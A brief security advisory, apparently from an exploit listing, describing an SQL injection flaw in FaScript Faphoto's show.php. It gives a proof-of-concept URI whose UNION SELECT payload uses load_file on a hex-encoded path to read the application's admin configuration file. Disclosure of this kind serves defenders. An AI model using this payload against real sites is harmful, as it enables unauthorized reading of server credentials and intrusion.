|
FaScript Faphoto 'show.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/faname/show.php?id=-999999%27union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3,4,5,6/* |
|
Privacy Statement |